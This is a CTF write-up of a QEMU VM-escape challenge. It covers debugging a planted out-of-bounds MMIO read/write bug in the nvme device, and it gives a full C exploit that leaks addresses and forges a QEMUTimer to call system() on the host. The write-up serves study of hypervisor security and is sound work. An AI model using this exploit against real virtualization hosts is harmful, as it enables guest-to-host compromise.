QWB Final ExecChrome Writeup

Challenge Description

Handout: a VMware virtual machine image.
Description: the challenge is modeled on a QEMU CVE; vulnerable code was planted in one of QEMU's device modules, causing unexpected control flow and enabling a VM escape. Contestants work inside an Ubuntu guest running under QEMU and must trigger the bug to execute arbitrary code on the host (Deepin Linux).
Demo network topology: one switch connecting the contestant's attack machine and the target machine.
Demo procedure and requirements: the contestant brings their own attack machine on stage and connects it to the switch. The target machine runs Deepin Linux as the host, with an Ubuntu guest nested inside QEMU. The guest's port 22 is forwarded to port 2222 on the host. The contestant connects with ssh to port 2222 on the host (user: ubuntu, password: 123456), runs the exploit inside the Ubuntu guest, and within the time limit must execute "google-chrome --no-sandbox file:///home/qwb/Desktop/success.mp4" on the host. The demo counts as successful when Chrome pops up on the host and plays the success animation.
The host runs a bash script that monitors QEMU and restarts it automatically if it crashes; contestants should wait until the guest's ssh connection recovers. If QEMU cannot be restarted, the contestant may request that the VM be restored to its initial snapshot; the clock is not paused during the restore.
Timing: the clock starts the first time the contestant successfully logs in to the Ubuntu guest.

  • launch.sh

    #!/bin/bash
    while true
    do ./qemu-system-x86_64 -m 1024 -smp 2 -boot c -cpu host -hda ubuntu_server.qcow2 --enable-kvm -drive file=./blknvme,if=none,id=D22 -device nvme,drive=D22,serial=1234 -net user,hostfwd=tcp::2222-:22 -net nic && sleep 5
    done
  • qemu-system-x86_64 信息

    qwb@ExecChrome:~/Desktop/QWB$ ./qemu-system-x86_64  --version
    QEMU emulator version 4.0.50 (v4.0.0-1043-ge2a58ff493-dirty)
    Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers

Challenge Analysis

During the contest:

Since this was my first time working with QEMU, I had little background knowledge to draw on. The first thing I did was download the QEMU source from GitHub and compile it inside the provided VM. While it compiled, I read writeups of QEMU VM-escape challenges from past CTFs. From them I learned that the bug is usually planted in a loaded virtual device, and that the guest talks to a virtual device through MMIO or port I/O. Exploits are typically written in one of two ways: either as a kernel driver that interacts with the device, or by mapping the device's address space into user memory and interacting with it directly.

After a few writeups, my QEMU build inside the VM was done. I opened both binaries in IDA: my own build and the one shipped with the challenge. I wanted to run an off-the-shelf diffing tool, but loading was painfully slow (IDA under Linux wine was not worth fighting), so I gave up on that approach. Comparing by eye instead, most functions decompiled essentially identically. Since the challenge environment loads an nvme device, I searched for nvme-related functions and focused on the read and write paths, and found that nvme_mmio_read and nvme_mmio_write had both been modified: each had one conditional check removed. At that point it was fairly clear the read/write paths were the problem, likely an out-of-bounds read/write. Since the description said the challenge was based on a CVE, I searched around and, in the repo, found CVE-2018-16847.

So began the hunt for a PoC, which turned up nothing.

Next I tried to trigger the vulnerable code to confirm the theory. Following writeups found online, I discovered that copy-pasting other people's code did not do what I needed, and my knowledge of nvme devices was thin, so I started improvising. First attempt: interact with the nvme device indirectly through the already-loaded nvme driver. I copied nvme.ko out and dropped it into IDA; after staring at it for a long time without finding anything usable as a test harness, I gave up. Second attempt: interact through nvme-cli; this did reach the device's nvme functions, but never the code path I wanted.

After all that I was stuck in a dead end, and spent the next day and a half just digging through material (i.e. slacking off).

  • nvme_mmio_read

nvme_mmio_read.png

  • nvme_mmio_write

nvme_mmio_write.png

After the contest:

Two days on this one challenge with zero progress felt pretty crushing. After the contest I asked some veterans and learned that the vulnerable code is indeed where the screenshots above show, and that the final RIP hijack goes through a timer.

So the searching resumed. Only then did I learn about the pcimem project on GitHub, whose code, once wrapped, lets you read and write PCI devices directly from user space. w0lfzhang's vmescape contains his wrapped versions of these functions, which can be reused as-is.

Starting over:

lspci -vv shows detailed information for each PCI device.

00:04.0 Non-Volatile memory controller: Intel Corporation QEMU NVM Express Controller (rev 02) (prog-if 02 [NVM Express])
Subsystem: Red Hat, Inc. QEMU Virtual Machine
Physical Slot: 4
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+
Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast >TAbort- <TAbort- <MAbort- >SERR- <PERR- INTx-
Latency: 0
Interrupt: pin A routed to IRQ 10
Region 0: Memory at febf0000 (64-bit, non-prefetchable) [size=8K]
Region 4: Memory at febf3000 (32-bit, non-prefetchable) [size=4K]
Capabilities: [40] MSI-X: Enable+ Count=64 Masked-
Vector table: BAR=4 offset=00000000
PBA: BAR=4 offset=00000800
Capabilities: [80] Express (v2) Endpoint, MSI 00
DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s <64ns, L1 <1us
ExtTag- AttnBtn- AttnInd- PwrInd- RBE+ FLReset-
DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported-
RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop-
MaxPayload 128 bytes, MaxReadReq 128 bytes
DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend-
LnkCap: Port #0, Speed 2.5GT/s, Width x1, ASPM L0s, Exit Latency L0s <64ns, L1 <1us
ClockPM- Surprise- LLActRep- BwNot- ASPMOptComp-
LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- CommClk-
ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt-
LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk- DLActive+ BWMgmt- ABWMgmt-
DevCap2: Completion Timeout: Not Supported, TimeoutDis-, LTR-, OBFF Not Supported
DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis-, LTR-, OBFF Disabled
LnkSta2: Current De-emphasis Level: -6dB, EqualizationComplete-, EqualizationPhase1-
EqualizationPhase2-, EqualizationPhase3-, LinkEqualizationRequest-
Kernel driver in use: nvme
Kernel modules: nvme

Look at the device's sysfs files. resource0 corresponds to Region 0 and resource4 to Region 4; these are the device's mappable memory regions. They are generated from the resource definition sections parsed out of the PCI configuration space, attached by the PCI bus driver during device initialization. They are binary attributes that implement no read/write interface, only mmap.

root@ExecChrome:/home/ubuntu# ls -al /sys/devices/pci0000\:00/0000\:00\:04.0/
total 0
drwxr-xr-x 5 root root 0 Jul 4 08:17 .
drwxr-xr-x 12 root root 0 Jul 4 2019 ..
-rw-r--r-- 1 root root 4096 Jul 4 08:17 broken_parity_status
-r--r--r-- 1 root root 4096 Jul 4 2019 class
-rw-r--r-- 1 root root 256 Jul 4 2019 config
-r--r--r-- 1 root root 4096 Jul 4 08:17 consistent_dma_mask_bits
-rw-r--r-- 1 root root 4096 Jul 4 08:17 d3cold_allowed
-r--r--r-- 1 root root 4096 Jul 4 2019 device
-r--r--r-- 1 root root 4096 Jul 4 08:17 dma_mask_bits
lrwxrwxrwx 1 root root 0 Jul 4 2019 driver -> ../../../bus/pci/drivers/nvme
-rw-r--r-- 1 root root 4096 Jul 4 08:17 driver_override
-rw-r--r-- 1 root root 4096 Jul 4 08:17 enable
lrwxrwxrwx 1 root root 0 Jul 4 08:17 firmware_node -> ../../LNXSYSTM:00/LNXSYBUS:00/PNP0A03:00/device:06
-r--r--r-- 1 root root 4096 Jul 4 2019 irq
-r--r--r-- 1 root root 4096 Jul 4 08:17 local_cpulist
-r--r--r-- 1 root root 4096 Jul 4 2019 local_cpus
-r--r--r-- 1 root root 4096 Jul 4 2019 modalias
-rw-r--r-- 1 root root 4096 Jul 4 08:17 msi_bus
drwxr-xr-x 2 root root 0 Jul 4 2019 msi_irqs
-rw-r--r-- 1 root root 4096 Jul 4 2019 numa_node
drwxr-xr-x 3 root root 0 Jul 4 2019 nvme
-r--r--r-- 1 root root 4096 Jul 4 08:17 pools
drwxr-xr-x 2 root root 0 Jul 4 08:17 power
--w--w---- 1 root root 4096 Jul 4 08:17 remove
--w--w---- 1 root root 4096 Jul 4 08:17 rescan
-r--r--r-- 1 root root 4096 Jul 4 2019 resource
-rw------- 1 root root 8192 Jul 4 08:17 resource0
-rw------- 1 root root 4096 Jul 4 08:17 resource4
lrwxrwxrwx 1 root root 0 Jul 4 2019 subsystem -> ../../../bus/pci
-r--r--r-- 1 root root 4096 Jul 4 2019 subsystem_device
-r--r--r-- 1 root root 4096 Jul 4 2019 subsystem_vendor
-rw-r--r-- 1 root root 4096 Jul 4 2019 uevent
-r--r--r-- 1 root root 4096 Jul 4 2019 vendor

pcimem can then be used to read and write the resource0 space for debugging.

root@ExecChrome:/home/ubuntu#  ./pcimem /sys/devices/pci0000\:00/0000\:00\:04.0/resource0 0x100 d
/sys/devices/pci0000:00/0000:00:04.0/resource0 opened.
Target offset is 0x100, page size is 4096
mmap(0, 4096, 0x3, 0x1, 3, 0x100)
PCI Memory mapped to address 0x7f1f8f5a4000.
0x0100: 0x00007F6ED4279530

Set a conditional breakpoint in gdb:

break nvme_mmio_read if $rsi==0x100
Thread 4 "qemu-system-x86" hit Breakpoint 5, nvme_mmio_read (opaque=0x557463fc33d0, addr=0x100, size=0x4) at /home/ctflag/tools/qemu/hw/block/nvme.c:1066
1066 in /home/ctflag/tools/qemu/hw/block/nvme.c

gdb-peda$ p n
$3 = (NvmeCtrl *) 0x557463fc33d0
gdb-peda$ p ptr
$4 = (uint8_t *) 0x557463fc3e90 "\377\a\003\017 "
gdb-peda$ p $3->bar
$5 = {
cap = 0x4000200f0307ff,
vs = 0x10200,
intms = 0x0,
intmc = 0x0,
cc = 0x460001,
rsvd1 = 0x0,
csts = 0x1,
nssrc = 0x0,
aqa = 0xff00ff,
asq = 0x356c4000,
acq = 0x34c74000,
cmbloc = 0x0,
cmbsz = 0x0
}
gdb-peda$ p &$3->bar
$6 = (NvmeBar *) 0x557463fc3e90
gdb-peda$ x /gx 0x557463fc3e90+0x100
0x557463fc3f90: 0x00007f6ed4279530
gdb-peda$

So nvme_mmio_read reads data at the address n->bar plus the MMIO offset addr. n is of type NvmeCtrl and lives on the heap; since the structure contains both code-segment and heap pointers, this gives us the leak.
gdb-peda$ ptype NvmeCtrl
type = struct NvmeCtrl {
PCIDevice parent_obj;
MemoryRegion iomem;
MemoryRegion ctrl_mem;
NvmeBar bar;
BlockConf conf;
uint32_t page_size;
uint16_t page_bits;
uint16_t max_prp_ents;
uint16_t cqe_size;
uint16_t sqe_size;
uint32_t reg_size;
uint32_t num_namespaces;
uint32_t num_queues;
uint32_t max_q_ents;
uint64_t ns_size;
uint32_t cmb_size_mb;
uint32_t cmbsz;
uint32_t cmbloc;
uint8_t *cmbuf;
uint64_t irq_status;
char *serial;
NvmeNamespace *namespaces;
NvmeSQueue **sq;
NvmeCQueue **cq;
NvmeSQueue admin_sq;
NvmeCQueue admin_cq;
NvmeIdCtrl id_ctrl;
}

When nvme_mmio_write is called with addr <= 0xfff it enters nvme_write_bar(opaque, addr, data, size). At the end of nvme_write_bar the challenge author added code that gives us an arbitrary write into the 0x1000 bytes starting at n->bar:
......
    {
        *(&n->bar.cap + offset) = dataa;
    }
    else if ( sizea > 2 )
    {
        if ( sizea == 4 )
        {
            *(&n->bar.cap + offset) = dataa;
        }
        else if ( sizea == 8 )
        {
            *(&n->bar.cap + offset) = dataa;
        }
    }
    else if ( sizea == 1 )
    {
        *(&n->bar.cap + offset) = dataa;
    }
    break;
}
}

root@ExecChrome:/home/ubuntu# ./pcimem /sys/devices/pci0000\:00/0000\:00\:04.0/resource0 0x100 d 0x12345678deadbeef

This writes 0x12345678deadbeef at offset 0x100. The breakpoint is hit twice, four bytes written each time:

Thread 3 "qemu-system-x86" hit Breakpoint 2, nvme_mmio_write (opaque=0x557463fc33d0, addr=0x100, data=0xdeadbeef, size=0x4) at /home/ctflag/tools/qemu/hw/block/nvme.c:1171
1171 in /home/ctflag/tools/qemu/hw/block/nvme.c

Thread 3 "qemu-system-x86" hit Breakpoint 2, nvme_mmio_write (opaque=0x557463fc33d0, addr=0x104, data=0x12345678, size=0x4) at /home/ctflag/tools/qemu/hw/block/nvme.c:1171
1171 in /home/ctflag/tools/qemu/hw/block/nvme.c

gdb-peda$ x /gx 0x557463fc3e90+0x100
0x557463fc3f90: 0x12345678deadbeef    // the value has been written

root@ExecChrome:/home/ubuntu# ./pcimem /sys/devices/pci0000\:00/0000\:00\:04.0/resource0 0x100 d
/sys/devices/pci0000:00/0000:00:04.0/resource0 opened.
Target offset is 0x100, page size is 4096
mmap(0, 4096, 0x3, 0x1, 3, 0x100)
PCI Memory mapped to address 0x7fd400531000.
0x0100: 0x12345678DEADBEEF
root@ExecChrome:/home/ubuntu#

At this point the leak is easy; hijacking control flow requires corrupting some pointer stored after n->bar. NvmeCtrl contains the admin_cq and admin_sq queue structures, and NvmeCQueue contains a pointer of type QEMUTimer; once expire_time is reached, cb(opaque) is invoked. We never arm the timer explicitly here; it only fires on guest shutdown or reboot.

gdb-peda$ ptype NvmeCQueue
type = struct NvmeCQueue {
struct NvmeCtrl *ctrl;
uint8_t phase;
uint16_t cqid;
uint16_t irq_enabled;
uint32_t head;
uint32_t tail;
uint32_t vector;
uint32_t size;
uint64_t dma_addr;
QEMUTimer *timer;
union {
struct NvmeSQueue *tqh_first;
QTailQLink tqh_circ;
} sq_list;
union {
struct NvmeRequest *tqh_first;
QTailQLink tqh_circ;
} req_list;
}


gdb-peda$ ptype QEMUTimer
type = struct QEMUTimer {
int64_t expire_time;
QEMUTimerList *timer_list;
QEMUTimerCB *cb;//func ptr
void *opaque;//arg0
QEMUTimer *next;
int attributes;
int scale;
}

gdb-peda$ p $3->admin_cq
$8 = {
ctrl = 0x557463fc33d0,
phase = 0x1,
cqid = 0x0,
irq_enabled = 0x1,
head = 0xa,
tail = 0xa,
vector = 0x0,
size = 0x100,
dma_addr = 0x34c74000,
timer = 0x7f6ed4266910,
sq_list = {
tqh_first = 0x557463fc3f70,
tqh_circ = {
tql_next = 0x557463fc3f70,
tql_prev = 0x557463fc3fc0
}
},
req_list = {
tqh_first = 0x0,
tqh_circ = {
tql_next = 0x0,
tql_prev = 0x557463fc4010
}
}
}
gdb-peda$ p $3->admin_cq->timer
$9 = (QEMUTimer *) 0x7f6ed4266910
gdb-peda$ p *($3->admin_cq->timer)
$10 = {
expire_time = 0xffffffffffffffff,
timer_list = 0x5574632dd1a0,
cb = 0x55746068fc2d <nvme_post_cqes>,
opaque = 0x557463fc3fd0,
next = 0x0,
attributes = 0x0,
scale = 0x1
}
gdb-peda$ p &$3->bar
$11 = (NvmeBar *) 0x557463fc3e90
gdb-peda$ p /x &$3->admin_cq->timer
$12 = 0x557463fc3ff8
gdb-peda$ p /x 0x557463fc3ff8-0x557463fc3e90
$13 = 0x168

Exploitation

  • Use the arbitrary read to leak a code address and a heap address; since system appears in QEMU's GOT, there is no need to leak a libc address separately.
  • Overwrite admin_cq's timer to point into the run of zero bytes at the end of id_ctrl. One pitfall found the hard way: the fake argument and fake structure must be placed to avoid the heap-management metadata, otherwise a later free blows up, or the fd field gets clobbered and corrupts the structure.
  • When forging the timer structure, the timer_list pointer must remain valid.

calc.jpg

Final exploit

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <ctype.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <assert.h>

#define PRINT_ERROR \
    do { \
        fprintf(stderr, "Error at line %d, file %s (%d) [%s]\n", \
                __LINE__, __FILE__, errno, strerror(errno)); \
        exit(1); \
    } while(0)

#define MAP_SIZE 4096UL
#define MAP_MASK (MAP_SIZE - 1)

void debug(void *str)
{
    printf("%s", (char *)str);
}

int fd = -1;

char *filename = "/sys/devices/pci0000:00/0000:00:04.0/resource0";

void pcimem_read(uint64_t target, char access_type, uint64_t *read_result)
{
    /* Map one page */
    void *map_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, target & ~MAP_MASK);
    if (map_base == (void *)-1) PRINT_ERROR;
    printf("PCI Memory mapped to address 0x%08lx.\n", (unsigned long)map_base);

    void *virt_addr = map_base + (target & MAP_MASK);

    int type_width = 0;

    switch (access_type)
    {
        case 'b':
            *read_result = *((uint8_t *)virt_addr);
            type_width = 1;
            break;
        case 'h':
            *read_result = *((uint16_t *)virt_addr);
            type_width = 2;
            break;
        case 'w':
            *read_result = *((uint32_t *)virt_addr);
            type_width = 4;
            break;
        case 'd':
            *read_result = *((uint64_t *)virt_addr);
            type_width = 8;
            break;
    }

    printf("Value at offset 0x%X (%p): 0x%0*lX\n", (int)target, virt_addr, type_width * 2, *read_result);
    if (munmap(map_base, MAP_SIZE) == -1)
        PRINT_ERROR;
}

void pcimem_write(uint64_t target, char access_type, uint64_t writeval)
{
    /* Map one page */
    void *map_base = mmap(0, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, target & ~MAP_MASK);
    if (map_base == (void *)-1) PRINT_ERROR;
    printf("PCI Memory mapped to address 0x%08lx.\n", (unsigned long)map_base);
    uint64_t read_result = 0;
    int type_width = 0;
    void *virt_addr = map_base + (target & MAP_MASK);
    switch (access_type)
    {
        case 'b':
            *((uint8_t *)virt_addr) = writeval;
            read_result = *((uint8_t *)virt_addr);
            type_width = 1;
            break;
        case 'h':
            *((uint16_t *)virt_addr) = writeval;
            read_result = *((uint16_t *)virt_addr);
            type_width = 2;
            break;
        case 'w':
            *((uint32_t *)virt_addr) = writeval;
            read_result = *((uint32_t *)virt_addr);
            type_width = 4;
            break;
        case 'd':
            *((uint64_t *)virt_addr) = writeval;
            read_result = *((uint64_t *)virt_addr);
            type_width = 8;
            break;
    }
    //readback not correct?
    printf("Written 0x%0*lX; readback 0x%0*lX\n", type_width * 2, writeval, type_width * 2, read_result);
    if (munmap(map_base, MAP_SIZE) == -1)
        PRINT_ERROR;
}

int main(int argc, char *argv[])
{
    if ((fd = open(filename, O_RDWR | O_SYNC)) == -1)
        PRINT_ERROR;

    uint64_t data = 0;
    //step 1: get binary address
    pcimem_read(0x11b8, 'd', &data);
    uint64_t bin_addr = (uint64_t)data - 0x760aa3;
    printf("[+] binary @ 0x%lX\n", bin_addr);
    uint64_t system_addr = bin_addr + 0x2bc600;
    printf("[+] system @ 0x%lX\n", system_addr);
    //step 2: get heap address
    pcimem_read(0x128, 'd', &data);
    uint64_t heap_addr = (uint64_t)data - 0x120;
    printf("[+] heap @ 0x%lX\n", heap_addr);
    //step 3: fake obj
    /*
    $8 = {
        expire_time = 0xffffffffffffffff,
        timer_list = 0x560d8ffde1a0,
        cb = 0x560d8ef61c2d <nvme_post_cqes>,
        opaque = 0x560d90cc4fd0,
        next = 0x0,
        attributes = 0x0,
        scale = 0x1
    }
    */
    char cmd[] = "deepin-calculator\x00";
    // 5555555547a4: 0x632d6e6970656564 0x6f74616c75636c61
    // 5555555547b4: 0x000a786c25000072
    uint64_t cmd_addr = heap_addr + 0xdb8;
    uint64_t fake_obj = heap_addr + 0xd90;
    pcimem_write(0xd90, 'd', 0xffffffffffffffff);   //expire_time
    pcimem_write(0xd98, 'd', heap_addr - 0xce6cf0); //timer_list
    pcimem_write(0xda0, 'd', system_addr);          //cb
    pcimem_write(0xda8, 'd', cmd_addr);             //opaque
    pcimem_write(0xdb8, 'd', 0x632d6e6970656564);   //"deepin-c"
    pcimem_write(0xdc0, 'd', 0x6f74616c75636c61);   //"alculato"
    pcimem_write(0xdc8, 'd', 0x72);                 //"r\0"
    pcimem_write(0x100, 'd', fake_obj);             //modify admin_sq->timer
    // pcimem_write(0x168, 'd', fake_obj);          //modify admin_cq->timer
    return 0;
}

References